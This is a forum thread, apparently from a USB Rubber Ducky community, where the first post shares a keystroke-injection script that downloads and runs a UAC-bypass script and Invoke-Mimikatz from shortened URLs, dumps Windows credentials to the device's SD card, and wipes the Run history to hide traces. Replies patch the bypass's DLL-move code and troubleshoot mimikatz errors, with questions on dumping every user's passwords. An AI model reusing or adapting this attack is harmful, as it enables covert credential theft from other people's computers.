linuxbman Posted September 19, 2016 Share Posted September 19, 2016 Hi all, I've been playing with the ducky for some time, figured it was time to give back to the community. I've incorporated the new UAC Bypass exploit with the Invoke-Mimikatz payload to dump to my SD card on my ducky, as I have the twin Ducky firmware, with the mimikatz output named after the computer. The only issue I am having is that when it does the UAC Bypass it does not recognize the exit after, so there is still a small window present. I suspect it is because the exploit pops the new window up, and likely there is nothing I can do. Hopefully someone can figure it out. Otherwise it works pretty nice. Feel free to clean it up and make it better. REM open cmd and set drive letter DELAY 2000 WINDOWS r DELAY 200 STRING cmd.exe /T:01 /K mode CON: COLS=15 LINES=1 ENTER DELAY 1000 STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/fPl4tm'); Bypass-UAC -Method ucmDismMethod; exit;" ENTER DELAY 1000 REM Shrink windows STRING mode CON: COLS=15 LINES=1 ENTER REM get Ducky Drive letter STRING $drive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'DUCKY'} ENTER DELAY 500 REM Run Mimikatz and dump to ducky in file named after computer STRING IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/KBCGCr'); $Output = Invoke-Mimikatz -DumpCreds; $Output | Out-File ($drive.Name+$env:computername+".txt"); ENTER DELAY 1000 STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; exit ENTER Quote Link to comment Share on other sites More sharing options...
Guest Posted September 19, 2016 Share Posted September 19, 2016 This looks awesome! Once I get one for myself I will definetly try it ^^ Quote Link to comment Share on other sites More sharing options...
anode Posted September 19, 2016 Share Posted September 19, 2016 Only did a quick skim, but what window stays alive? CMD? If 'exit' doesn't work try/add a ALT-F4 Quote Link to comment Share on other sites More sharing options...
Denny Posted September 21, 2016 Share Posted September 21, 2016 When i rerun this on the same pc, it asks if i want to replace the files. Can you fix this? Quote Link to comment Share on other sites More sharing options...
zacharygriffee Posted September 22, 2016 Share Posted September 22, 2016 Question: I'm also getting the 'replace files' dialog after the second application of this payload. I'm attempting to get rid of that 'replace files' dialog by modifying the ps1 script and putting the modified version on my web server. Since I didn't check prior to using the hack on my personal computer, the question I have is, does 'dismcore.dll' exist prior to applying this hack? Or does this hack create/spawn 'dismcore.dll' as a new dll for the system? The reason being, how I'm modifying the ps1 is that it assumes there is no dismcore.dll before the hack is applied. Quote Link to comment Share on other sites More sharing options...
zacharygriffee Posted September 22, 2016 Share Posted September 22, 2016 # Exploit logic if (Test-Path $($env:SystemRoot + '\System32\dismcore.dll')) { echo "[!] Already Have dismcore.dll, not moving file." } else { echo "[>] Performing elevated IFileOperation::MoveItem operation.." $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\System32\'), "dismcore.dll") $IFileOperation.PerformOperations() } At about line 1383 I just modded the ps1 at https://goo.gl/fPl4tm to whats in the code bock Quote Link to comment Share on other sites More sharing options...
personofinterest Posted September 23, 2016 Share Posted September 23, 2016 Worked on something similar to this tonight. Going to exfil and then post it Quote Link to comment Share on other sites More sharing options...
MrMoi Posted September 26, 2016 Share Posted September 26, 2016 nobody get this error on the txt file ? mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) What I found: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa Quote Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump). So, do not hesitate to start with: mimikatz # privilege::debug Privilege '20' OK mimikatz # log sekurlsa.log Using 'sekurlsa.log' for logfile : OK ...before others commands Quote Link to comment Share on other sites More sharing options...
th3count Posted September 28, 2016 Share Posted September 28, 2016 On 9/26/2016 at 6:03 AM, MrMoi said: nobody get this error on the txt file ? mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) What I found: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa I got it as well, I tried throwing those 2 commands first thing after the comments in mimikatz, It ended up just spitting out a metric ton of errors. I will try again tomorrow unless someone else has found a solution *Windows 10 x64 - 1607 Quote Link to comment Share on other sites More sharing options...
th3count Posted September 28, 2016 Share Posted September 28, 2016 1 hour ago, th3count said: I got it as well, I tried throwing those 2 commands first thing after the comments in mimikatz, It ended up just spitting out a metric ton of errors. I will try again tomorrow unless someone else has found a solution *Windows 10 x64 - 1607 I got it to run executing the new version manually in command line. the version on the google link is 2.0 new version is 2.1 maybe this? Quote Link to comment Share on other sites More sharing options...
soarece Posted October 12, 2016 Share Posted October 12, 2016 hello, How to tun mimkatz on RDP? Thank you Quote Link to comment Share on other sites More sharing options...
Ghostshell Posted October 13, 2016 Share Posted October 13, 2016 (edited) just copying and pasting the code, encoding it and putting on my ducky, I keep getting a replace file prompt on my Win7 machine and the script never fully finishes the prompt is from the bypass UAC section Edited October 13, 2016 by Ghostshell Quote Link to comment Share on other sites More sharing options...
soarece Posted September 10, 2017 Share Posted September 10, 2017 just copying and pasting the code, encoding it and putting on my ducky, ok.. but how to do this?? I dont see the usb rubber connected to pc. Quote Link to comment Share on other sites More sharing options...
Exmix Posted September 10, 2017 Share Posted September 10, 2017 On 9/26/2016 at 8:03 AM, MrMoi said: nobody get this error on the txt file ? mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) What I found: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa On 9/27/2016 at 11:08 PM, th3count said: I got it as well, I tried throwing those 2 commands first thing after the comments in mimikatz, It ended up just spitting out a metric ton of errors. I will try again tomorrow unless someone else has found a solution *Windows 10 x64 - 1607 On 9/28/2016 at 0:57 AM, th3count said: I got it to run executing the new version manually in command line. the version on the google link is 2.0 new version is 2.1 maybe this? When I was working with this, I found it SEEMS to be an issue with WIndows 10, I got it to work on Win7 with no issues but when I tried it on 5-6 various Win10 machines, I always get that output, been looking for a fix for that. Quote Link to comment Share on other sites More sharing options...
soarece Posted September 20, 2017 Share Posted September 20, 2017 Hello, I see mimikatz decrypt password only for the active user. If on the same Pc are more users with different passwords how we can use mimikatz to decrypt password for all of them? Thank you Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.